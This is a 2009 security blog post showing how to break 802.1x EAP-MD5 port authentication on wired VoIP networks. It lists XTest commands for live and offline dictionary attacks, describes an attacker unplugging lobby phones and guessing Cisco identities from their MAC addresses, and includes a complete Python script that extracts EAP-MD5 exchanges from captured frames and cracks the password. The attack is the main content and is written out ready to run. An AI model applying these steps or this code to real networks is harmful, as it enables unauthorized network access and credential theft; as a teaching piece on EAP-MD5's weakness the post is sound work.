Breaking into 802.1x EAP-MD5 Port based authentication in Wired VoIP Network – II

Now that we have simulated the production network in the previous post of this series, we can proceed to the actual attack. I will explain the password-breaking procedure using a freely available tool. Read more here about setting up port-based authentication in a wired VoIP network.
Sipera Viper Lab has released a new tool, XTest, that automates breaking the password used by 802.1x EAP-MD5 port-based authentication.
The tool is released under the GPLv3 license and hosted on sourceforge.net. XTest has some cool features:

  • 802.1x Supplicant: XTest can test a username and password against an 802.1x authenticator (Ethernet switch), and supports re-authentication.
  • Offline pcap dictionary attack: if you capture a valid 802.1x authentication sequence into a pcap file, XTest runs an offline dictionary attack against that sequence using a supplied wordlist, and recovers the password from the pcap if the wordlist contains it.
  • Shared hub unauthorized access: using a shared hub, XTest can ride on the successful authentication of a valid 802.1x supplicant to gain unauthorized access to the network.


Here is the list of steps an attacker could take to get unauthorized access to the physical network.
Assumption: the attacker is already on the victim's premises and has access to phones in the lobby or reception area.

  • The attacker looks at the phone model and MAC address to learn the username, then unplugs the phone from the switch port.
  • As we already know, Cisco uses a hard-coded username as the identity for authentication, so for a Cisco 7961G phone the username is CP-7961G-SEP<MacAddress>.
  • Using XTest, the attacker can then try to get access with the learned username and guessed passwords.

bughira@chackraview:~/xtest-1.0# ./xtest -u <UserName> -p <test-Pwd>
The above command tries to complete the authentication sequence for the given username with the given password. Instead of testing passwords one by one, you can use the live dictionary attack feature of XTest:
feed it a good password dictionary and it will try every password in the dictionary against the switch.
bughira@chackraview:~/xtest-1.0# ./xtest -u <UserName> -w <DictionaryFile>

  • Offline dictionary attack: supply a pcap file of an EAP-MD5 authentication that ended in EAP-Success, and XTest retrieves the username, challenge and response from that exchange and breaks the password offline against your wordlist.
bughira@chackraview:~/xtest-1.0# ./xtest -c EAP_MD5_SUCCESS.pcap -w <DictionaryFile>
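As an added example, not part of XTest or of the original post, here is the offline attack in Python. It walks a set of raw EAPOL frames, picks out the EAP-Response/Identity, the EAP-Request/MD5-Challenge and the matching EAP-Response/MD5-Challenge (matched by EAP identifier, so re-authentications in one capture do not confuse it), and then tries each candidate password by computing MD5(identifier || password || challenge), which is all EAP-MD5 ever sends. The frames, the MAC address, the identifier, the challenge and the wordlist are constructed for this example; a real run would take the frames out of EAP_MD5_SUCCESS.pcap instead.

```python
import hashlib
import struct

ETHERTYPE_EAPOL = 0x888E
EAP_REQUEST, EAP_RESPONSE, EAP_SUCCESS, EAP_FAILURE = 1, 2, 3, 4
EAP_TYPE_IDENTITY, EAP_TYPE_MD5 = 1, 4


def build_eapol_frame(code, identifier, eap_type=None, type_data=b"",
                      src=bytes.fromhex("001122334455"),
                      dst=bytes.fromhex("0180c2000003")):
    """Build an Ethernet/EAPOL/EAP-Packet frame. Used only to construct the sample capture."""
    body = b"" if eap_type is None else bytes([eap_type]) + type_data
    eap = struct.pack("!BBH", code, identifier, 4 + len(body)) + body
    eapol = struct.pack("!BBH", 1, 0, len(eap)) + eap   # EAPOL version 1, type 0 = EAP-Packet
    return dst + src + struct.pack("!H", ETHERTYPE_EAPOL) + eapol


def parse_eap(frame):
    """Return (code, identifier, eap_type, type_data) for an EAPOL EAP-Packet, else None."""
    if len(frame) < 22 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_EAPOL:
        return None
    _version, ptype, plen = struct.unpack("!BBH", frame[14:18])
    if ptype != 0:                      # EAPOL-Start, EAPOL-Logoff, EAPOL-Key carry no EAP
        return None
    eap = frame[18:18 + plen]
    code, identifier, elen = struct.unpack("!BBH", eap[:4])
    eap = eap[:elen]
    if code in (EAP_SUCCESS, EAP_FAILURE) or elen < 5:
        return code, identifier, None, b""
    return code, identifier, eap[4], eap[5:]


def extract_md5_exchange(frames):
    """Recover identity, EAP identifier, challenge and response from captured frames."""
    identity, challenges, exchange = None, {}, None
    for frame in frames:
        parsed = parse_eap(frame)
        if parsed is None:
            continue
        code, ident, etype, data = parsed
        if code == EAP_RESPONSE and etype == EAP_TYPE_IDENTITY:
            identity = data.decode("ascii", errors="replace")
        elif code == EAP_REQUEST and etype == EAP_TYPE_MD5:
            challenges[ident] = data[1:1 + data[0]]          # Value-Size, Value, [Name]
        elif code == EAP_RESPONSE and etype == EAP_TYPE_MD5 and ident in challenges:
            exchange = {"identity": identity, "identifier": ident,
                        "challenge": challenges[ident], "response": data[1:1 + data[0]]}
    return exchange


def eap_md5_response(identifier, password, challenge):
    """EAP-MD5 (RFC 3748, via RFC 1994 CHAP): MD5(Identifier || secret || challenge)."""
    return hashlib.md5(bytes([identifier]) + password.encode() + challenge).digest()


def crack_eap_md5(exchange, wordlist):
    """Offline dictionary attack: return the password that reproduces the captured response."""
    for candidate in wordlist:
        if eap_md5_response(exchange["identifier"], candidate,
                            exchange["challenge"]) == exchange["response"]:
            return candidate
    return None


# Constructed sample capture (assumed values): a Cisco-style identity, a made-up 16-byte
# challenge, and the password "cisco". Real input would be the frames read from the pcap.
IDENTITY = b"CP-7961G-SEP001122334455"
CHALLENGE = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")
IDENT = 0x42
SAMPLE_FRAMES = [
    bytes.fromhex("ffffffffffff0011223344550806") + b"\x00" * 28,   # an ARP frame, ignored
    build_eapol_frame(EAP_REQUEST, 1, EAP_TYPE_IDENTITY),
    build_eapol_frame(EAP_RESPONSE, 1, EAP_TYPE_IDENTITY, IDENTITY),
    build_eapol_frame(EAP_REQUEST, IDENT, EAP_TYPE_MD5,
                      bytes([len(CHALLENGE)]) + CHALLENGE + b"switch"),
    build_eapol_frame(EAP_RESPONSE, IDENT, EAP_TYPE_MD5,
                      bytes([16]) + eap_md5_response(IDENT, "cisco", CHALLENGE) + IDENTITY),
    build_eapol_frame(EAP_SUCCESS, IDENT),
]
WORDLIST = ["password", "123456", "admin", "cisco", "letmein"]

if __name__ == "__main__":
    ex = extract_md5_exchange(SAMPLE_FRAMES)
    print("identity:", ex["identity"])
    print("password:", crack_eap_md5(ex, WORDLIST))
```

The only thing a real capture adds is the pcap container: read the record payloads out of the file (or with scapy's `rdpcap`) and pass them as `frames`. Note that nothing in the exchange is secret except the password itself, and the authenticator never proves it knows the password either, which is why a single captured exchange is enough for an unlimited offline attack.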

  • Re-authentication attack: XTest has a built-in 802.1x supplicant and can be used to perform a re-authentication attack, as shown below.


XTest shows that EAP-MD5 port-based authentication cannot be relied upon on its own.

Download XTest here.
Happy Hunting..


2 Responses to “Breaking into 802.1x EAP-MD5 Port based authentication in Wired VoIP Network – II”

  1. VideoJak: Hijaking IP Video Calls!!! « Bughira’s Weblog Says:

    [...] have posted about XTest tool from VIPER Lab in my previous posts.  This is the third tool published by VIPER Lab after XTest and  UCSniff . VIPER Guys are [...]

  2. d2mypz Says:

    Hello, very nice site. Universe help us, don't worry man.


This entry was posted on Thursday, September 24th, 2009 at 6:44 pm and is filed under Information Security, Voice Over IP. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
